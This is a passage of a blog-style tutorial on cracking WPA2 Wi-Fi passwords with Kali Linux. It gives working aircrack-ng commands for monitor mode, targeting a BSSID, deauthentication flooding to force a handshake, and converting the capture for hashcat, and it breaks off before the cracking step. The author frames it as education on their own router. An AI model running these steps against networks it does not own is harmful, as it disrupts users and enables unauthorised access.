Part 1 – Background and Prerequisites
WPA2, or WiFi Protected Access 2, is the current standard for encryption on modern wireless networks. It first became available for use in 2004 and as such is a mature and robust technology that is only just starting to be replaced by the stronger WPA3 protocol. Cracking a network with WPA2 encryption isn’t easy, but it can be done depending on the strength of the network password and a hacker’s gear.
In this tutorial, I will show you how to reliably crack a vulnerable WPA2 network, often in under an hour.
Defining Vulnerability in Wi-Fi Encryption
As in nearly every security scenario, the stronger a network password is, the more difficult it will be to crack. In 2023, home routers typically ship with their default ESSID and password printed on the unit, and the password will often be a mix of letters, numbers and special characters at least 12 in length. As little as five years ago, this was not the case. TP-Link, for example, shipped their routers with an 8-character password consisting of numbers only.
Many (most?) people will never change their routers from its default settings, so it is completely reasonable to assume there are an enormous number of households with, let’s say, 10-year-old routers still using that default string of 8 numbers. Not good!
With my very modest PC, I can crack a password of this strength in about 35 minutes. To keep things in perspective, trying to crack a 12-character password that contains a mix of characters returns an estimated time in years rather than minutes. Moral of the story – use strong passwords!
Getting Started
- Kali Linux VM running on VMWare Player
- USB WiFi adapter that supports monitor mode
- Windows PC with discrete graphics card and hashcat installed
How do I install VMWare Player and Kali Linux?
Although this is a bit beyond the scope of this tutorial, I suggest using VMWare Player over Virtualbox because it handles assigning USB devices to the virtual machine seamlessly. That process is a bit more complex in Virtualbox.
You can download and install VMWare Player here – using all the defaults during the installation will be fine. Make sure your storage drive has a minimum of 15GB of empty space.
OffSec is nice enough to provide the community with pre-built virtual machines of Kali Linux for several different software solutions. Download the VMWare version here. Because this file is downloaded in .7z format, which Windows does not handle natively, you will need to first install 7zip software to extract the Kali Files.
With the Kali Files extracted, open up VMWare Player and open the folder with your Kali VM. Voila, you’re ready to go!
Does my Wi-Fi card support “monitor mode”?
Spolier: probably not. Though any commercially available computer purchased in the last 10-15 years includes a wireless network interface, most only support connecting to a wireless access point and exchanging data — this is called “managed mode.” You need a card that can be changed to listen to WiFi traffic and the quickest way to do this is to simply buy a USB WiFi adapter that you know will work. They are cheap and reliable and can be assigned to your Kali VM as soon as you plug it in (if you are using the VMWare Player). Here is a list of adapters that cyber professionals often turn to.
You can certainly try the commands below on your built-in WiFi card – some do work. I’m typing this right now on a Raspberry Pi 4+, which does support monitor mode. But you’ll probably just want to buy an adapter. I went with this one and it works great!
Do I really need a PC with a discrete graphics card?
No, not really. But the process we’ll use to crack the network password is much, much faster with a discrete graphics card than without. If you try this on a 2015 Celeron laptop with integrated graphics, you are not going to enjoy the experience.
You will need to install hashcat on your host system. This is easy to do in Windows, in fact, there is no installation at all. Download the hashcat binaries from here and extract the folder to a place you can find later. This is also a .7z file, by the way.
At this point, you are ready to get started on the cracking process. Fire up your Kali VM and continue on to Part 2 when you’re ready.
Process
Startup your Kali VM and make sure your USB Wifi adapter is assigned to it. I use the VMWare Player to run Kali, in part because assigning USB devices to the VM is super simple. Once Kali is running, plug in the adapter and VMWare will pop up a window asking if you want to assign the device to your host OS (no) or the VM (yes).
Check the current network configuration with the Wireless Tools package by typing iwconfig. You should see something like the following screenshot. Note that it reads “Mode:Managed” and the adapter’s name is “wlan0.”
For much of this tutorial, we will use the aircrack-ng suite of tools. These are installed by default on Kali, but can be installed on any Linux distribution using the package manager. Fire up airmon-ng to check for and kill any interfering processes:
sudo airmon-ng check killThe result will look similar to this:
You’re ready now to put your WiFi adapter into monitor mode. Make sure to replace “wlan0” below with whatever the name of your adapter is (above, the result of the iwconfig command).
sudo airmon-ng start wlan0You can check to make sure this was successful by issuing another iwconfig command, and the result should look similar to the screenshot below. Note that the adapter now says “Mode:Monitor” and the adapter name has been changed to “wlan0mon.”
We can now use the adapter to check for available WLAN’s with the following command:
sudo airodump-ng wlan0monAs you can see below, this shows a lot of useful information about the WLAN’s that happen to be in range of the the adapter.
In this case, the network that I am targeting is “TP-LINK_F3D2.” This is the vulnerable WPA2-protected network that I set up at my house with a TP-LINK router.
OK, this next part should go without saying, but please don’t use this process on a network that you don’t own yourself or have EXPLICIT permission to work with. These are powerful tools and I’m sure there is a temptation for some to take a laptop to a coffee shop or library and see what havoc can be wreaked, but that is both unethical and illegal. This tutorial and others like it exist for educational purposes only — learn how to do this stuff in the event that you might one day have a job that requires infiltrating criminal computer organizations (ie, military, police, etc.). Back to the fun stuff…
This airodump command is useful, but we need to restrict to display only the information about our target network. Write down the BSSID (this is also the MAC address), channel #, and ESSID of your target network on a piece of paper, then type in the following command, replacing my values with yours:
sudo airodump-ng -w TPLink1 -c 9 --bssid EC:08:6B:2B:F3:D2 wlan0monHere we’re telling airodump the name of the file to write once it captures the 4-way handshake between our adapter and the router. We’re also specifying the BSSID and channel to monitor. The result will look like this:
This is where things will get a bit tricky. As you can see above, I only have one client on the TP-LINK network because I set up this network specifically for this tutorial, but if you are cracking your own home network, you will probably see many clients appear under “STATION.” If nothing appears after a minute or so, you will need to get some WiFi enabled device onto the target network. Use a phone, tablet, another PC, etc. Once it’s connected, it’s MAC address will appear under STATION. Go ahead and sign it in and out of the network a few times; you’ll see that line appear and disappear as you do.
While your device is signed into the target network, open a new terminal window and issue the following command (again, make sure you replace my BSSID and adapter name with yours):
sudo aireplay-ng --deauth 0 -a EC:08:6B:2B:F3:D2 wlan0mon
This command will send repeated “deauthorization” commands to your router and kick off the device(s) you connected. Now, your iPhone or whatever you have connected to the target network, doesn’t like to be kicked off the network so it will immediately initiate a 4-way handshake to get back on. Return to the first terminal window. In a few seconds, you should see airodump display that it has capture the 4-way handshake hash. If so, you’re in business!
Airodump will have saved some files to your home directory, named according to the -w argument you specified in an earlier command – mine was TP-LINK1. In that case, the file that I need to take note of is TP-LINK1-01.cap, as shown below. Write down the name of the .cap file that was created on your system; this is what contains the 4-way handshake hash that we are going to crack.
Preparing Hashcat
We are going to use the program hashcat to do the rest of the work for us at this point. First, we must convert the .cap file mentioned above into a file that hashcat understands. For this, we’ll use a hashcat binary specifically for that purpose. Here is the command I used:
sudo /usr/share/hashcat-utils/cap2hccapx.bin TPLink1-01.cap wpa2.hccapxThe binary we need is called cap2hccapx.bin. In my Kali VM, that’s located at /usr/share/hashcat-utils, but your’s may be in a different location. Check to see if it’s in the usual address:
ls -a /usr/share/hashcat-utilsIf you get an error or nothing is in that directory, you will need to search the file system for that .bin. If you happen to be following along on Ubuntu, for example, this utility is in a different location. You can always issue which hashcat which will let you know if the main program is installed and if it can be found in /bin or /sbin.
The rest of the command above is simply the .cap file to be converted, and the name of the .hccapx file we’ve chosen. After running, you should see this (the number of handshakes will vary):
